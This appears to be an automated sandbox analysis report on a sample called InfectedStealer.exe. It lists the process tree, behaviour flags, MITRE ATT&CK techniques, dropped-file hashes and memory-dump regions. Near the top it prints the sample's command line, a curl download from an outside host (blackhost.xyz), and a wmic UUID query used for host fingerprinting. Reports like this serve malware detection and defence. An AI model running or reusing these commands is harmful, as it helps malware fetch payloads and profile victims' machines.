PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95

C:\Users\Admin\AppData\Local\Temp\InfectedStealer.exe
C:\Users\Admin\AppData\Local\Temp\InfectedStealer.exe curl -o "C:\path\to\save\Level 1 Deadc2ode.txt" "http://www.blackhost.xyz/srv/fup/uploads/Level%201%20Deadc2ode.txt"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1912
- C:\Windows\SysWOW64\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/KnUHfaCaRV
  2⤵
  PID:3544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff92b8c46f8,0x7ff92b8c4708,0x7ff92b8c4718
    3⤵
    PID:3608
- C:\Windows\SysWOW64\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/KnUHfaCaRV
  2⤵
  PID:2544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff92b8c46f8,0x7ff92b8c4708,0x7ff92b8c4718
    3⤵
    PID:4664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff92b8c46f8,0x7ff92b8c4708,0x7ff92b8c4718
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2
  2⤵
  PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
  2⤵
  PID:624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:3560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
  2⤵
  PID:3976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
  2⤵
  PID:1376
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
  2⤵
  PID:3208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
  2⤵
  PID:1816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5872 /prefetch:2
  2⤵
  PID:1340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:3052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
  2⤵
  PID:4332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3684 /prefetch:8
  2⤵
  PID:4836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2372 /prefetch:8
  2⤵
  - Modifies registry class
  PID:1680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:3496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18373238884872126721,11757261880930047692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:1848

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3444

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2356

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- System Location Discovery: System Language Discovery
PID:4852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f426165d1e5f7df1b7a3758c306cd4ae

SHA1
59ef728fbbb5c4197600f61daec48556fec651c1

SHA256
b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

SHA512
8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6960857d16aadfa79d36df8ebbf0e423

SHA1
e1db43bd478274366621a8c6497e270d46c6ed4f

SHA256
f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

SHA512
6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
180B

MD5
00a455d9d155394bfb4b52258c97c5e5

SHA1
2761d0c955353e1982a588a3df78f2744cfaa9df

SHA256
45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed

SHA512
9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e257a7f39919a1941a0521497acff1e0

SHA1
d67a6a3bd033f5b4db26b8a1d248c912f162c779

SHA256
1b0d6f4297028c71f678f345e48010097158aa4f807aae60656d728e366ccbed

SHA512
e27756f7131a04d338099ea3e6500d7faba179d5413ef283ed47685cd9e5eec24296dee1aed3d0c244a0427dfbd357c90016a5da7861d9aa16b0d9c549f353e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ebbd0ec4a6b2fd68e0006a91e93cb591

SHA1
43fd730006babcf9edfd7bbfad4c1d06af84901f

SHA256
ae842e6ebecde6ae737a6c47fc90338372f95787edeceb0b36556b0372c7436f

SHA512
f700c9b7c80a8f6d5c6c372dce2ec3da264b2c6848ad6f10c8973158d6d2ed844a5d5606658e1548eb4960850242b4d9189bc5a21449bc0d849708fbed3cf015

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
73cd17ef72bddbf7229aaac92dd6bd66

SHA1
aaa8fc15304a7ebe06e75eda68011ff5298b71b1

SHA256
f6d9839381227e8e74bac66971c1ef12a0d2dae4983c16598274c935204aee0f

SHA512
d93a82920d83b2d85c8833d51df5fef90c2a8f8fcef44ec335ebafa747bbebc5fbc97c7303d8b6b06b6fdab09d14c60ff5901102bf2d453f27589cde1f6310da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e2bee653f3d40e86728df74ef1fe3848

SHA1
36962f74c2f33f61b65eaa61aa0d071fa0b458d3

SHA256
955fc5ac77395b9ba8486cfb851fa8b83f7ada1082077be313efdb85ded093b5

SHA512
a2f8b237c1e9cc280d5e5ff80fb1707adc0e2e55bd9a7643844c091f896dfe73242eff24acc86393cb2a5cd9b0bcbe8ea149329462dad03991cea5e517691b58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1911843177bf8ec164a46de96ad33201

SHA1
3b5e6f8aef86dbc2a034703448bd0608ecda46fc

SHA256
d36ddd1da6ba883042605008443c168756ba3497485c3cfb0c6effd8b08a36e2

SHA512
2c80cfc8c9ec4c1602b0836f0bbe113ccf162ab90cff33ddfb43f23fc662832a569929ca09cdbadc42d5a87b3f8117d1a3cc94998b387f18b5e1277cee93b7a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
535B

MD5
9b00a7406078cfe60cac8eef2097dcb9

SHA1
d7dd97e124ab18a78b57920fc8bc49cfdcc56898

SHA256
cbce5096defa128cd43d6ce07112ae3ea5b70e8d73af749965f809287b1cf659

SHA512
13bc4393d8445c424438123379c46bf8f5282567e15bdf43fda58a4cb94fe3645aea3e6c11a802fa21e1113a0f6e29edc28822f23f1342faa2549c932f1350e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59e507.TMP

Filesize
201B

MD5
77c504a7bbd536e8dcad4f4abd896060

SHA1
9f5d4fcaa0938dbf99e7475218e474e30027b50a

SHA256
51af6e58a84270b978301c2bd2976a75b68dd8c2f29658e5e46cffba8ac14cc1

SHA512
dce9fcf7b0e297f78a2621caba841dafe66728cf7c7c66dff255adaa7270a3e152226ea6cb9060d7208d22a32207bf793b06ead2ab7d8c287487f718fd4c13b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f1983421-77a9-4fdd-ad69-cf4f95ff3731.tmp

Filesize
651B

MD5
fb37a001a86842c27396c84092666d13

SHA1
910df1b760f447403dcfb9d0d8b0e04c4d639368

SHA256
59df51e8c1209459520284604b889e021165ed6d20c6dbeef757bf2cc12ce8a6

SHA512
6548ec7abfcd2cc41c8ae470b866d7b7a29a4bbf240a61b2b124bf73eebfa1d104f11a4340d572804dbe06ff42eb8b327655294aed803f3fd967e1f2ec51b66a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
afa20a87e16b6d6f9bdc93c7cf4ac24d

SHA1
08ca017daf37376523538527433cccb7a9a4fa5a

SHA256
d8f4ac3d5f2e943155778ab016d9795042ed659113f77ea94aebb48b17d4a309

SHA512
85320cdcfc789a2dba8084575375442883c2770777ad81cd6b3491626bde9d1f88c7b8ca81151242848ebe328740d3f9667a76374c94beee4ba945f8bccf2e04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
41f71f4177860f15b3c49cf5a2dbae7d

SHA1
a99fed3009eb3584bb9b3874be7d8b3f316368b4

SHA256
61dd6310689b5ecf674592b50dd11ae3f2552c3bd607319b29adc473fc458ecf

SHA512
1e24e4d41761b84bf690c2b3b00d8172468fc23fca6c1a4ff43592f1f9ba7ab99c1415cd3ebe26009dcde3c2a6f46ce0a401179df78811240132a03f88d102ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
2731e701fd6f4256e999bc144bd722dc

SHA1
09faa483a9c873c81ce22143d4d132d0d815b62f

SHA256
719308665ef148442e1bb7cc7835f19142e824ff39bd474842e51ce53a90ff42

SHA512
d3ab97edabf6356395f2438a3bf30bccf5c53c09b08940b017419673a28fce3fff95a8e90d797668a4998d0f5b7a446534780c05a87df7ef189d9a179c07c164

Download Submit
C:\Users\Admin\Desktop\InfectedPayload.exe

Filesize
220KB

MD5
61ae59d5dfec46a20f0ef857bf759a0a

SHA1
44ebd18462988da04181e9197692bbb5c2673822

SHA256
5bad1092f2c05e51342a45c81651c1fc54ae87c57feb24e9342ae0dad2ff700c

SHA512
edefa56179c9772dcf9594938a879e57bd0b47c3027a946711b95801c978bc2cfeab8eee014cb1c3d1e4aeb5e6f9b7b6ec5a5e2bf4021406c3137a8f0f9b9716

Download Submit
memory/1912-12-0x000000000A1C0000-0x000000000A1D0000-memory.dmp

Filesize
64KB

Download
memory/1912-13-0x000000000A1D0000-0x000000000A1EE000-memory.dmp

Filesize
120KB

Download
memory/1912-19-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

Filesize
4KB

Download
memory/1912-20-0x0000000074D50000-0x0000000075500000-memory.dmp

Filesize
7.7MB

Download
memory/1912-21-0x0000000074D50000-0x0000000075500000-memory.dmp

Filesize
7.7MB

Download
memory/1912-22-0x0000000074D50000-0x0000000075500000-memory.dmp

Filesize
7.7MB

Download
memory/1912-17-0x0000000074D50000-0x0000000075500000-memory.dmp

Filesize
7.7MB

Download
memory/1912-16-0x000000000A600000-0x000000000A630000-memory.dmp

Filesize
192KB

Download
memory/1912-15-0x000000000B030000-0x000000000B146000-memory.dmp

Filesize
1.1MB

Download
memory/1912-14-0x000000000AEE0000-0x000000000B02A000-memory.dmp

Filesize
1.3MB

Download
memory/1912-11-0x000000000A150000-0x000000000A1AA000-memory.dmp

Filesize
360KB

Download
memory/1912-10-0x000000000A130000-0x000000000A13E000-memory.dmp

Filesize
56KB

Download
memory/1912-0-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

Filesize
4KB

Download
memory/1912-18-0x0000000074D50000-0x0000000075500000-memory.dmp

Filesize
7.7MB

Download
memory/1912-9-0x000000000A0C0000-0x000000000A12E000-memory.dmp

Filesize
440KB

Download
memory/1912-8-0x0000000009EA0000-0x000000000A0B4000-memory.dmp

Filesize
2.1MB

Download
memory/1912-7-0x0000000009BF0000-0x0000000009C10000-memory.dmp

Filesize
128KB

Download
memory/1912-152-0x0000000004DA0000-0x0000000004DAA000-memory.dmp

Filesize
40KB

Download
memory/1912-159-0x0000000010760000-0x00000000107C0000-memory.dmp

Filesize
384KB

Download
memory/1912-160-0x0000000000C70000-0x0000000000C7E000-memory.dmp

Filesize
56KB

Download
memory/1912-161-0x0000000006660000-0x000000000667A000-memory.dmp

Filesize
104KB

Download
memory/1912-162-0x0000000007C80000-0x0000000007C9C000-memory.dmp

Filesize
112KB

Download
memory/1912-6-0x0000000009BE0000-0x0000000009BEA000-memory.dmp

Filesize
40KB

Download
memory/1912-5-0x0000000009240000-0x0000000009260000-memory.dmp

Filesize
128KB

Download
memory/1912-4-0x0000000004E70000-0x0000000004F02000-memory.dmp

Filesize
584KB

Download
memory/1912-3-0x0000000074D50000-0x0000000075500000-memory.dmp

Filesize
7.7MB

Download
memory/1912-2-0x0000000005380000-0x0000000005924000-memory.dmp

Filesize
5.6MB

Download
memory/1912-1-0x00000000000D0000-0x0000000000526000-memory.dmp

Filesize
4.3MB

Download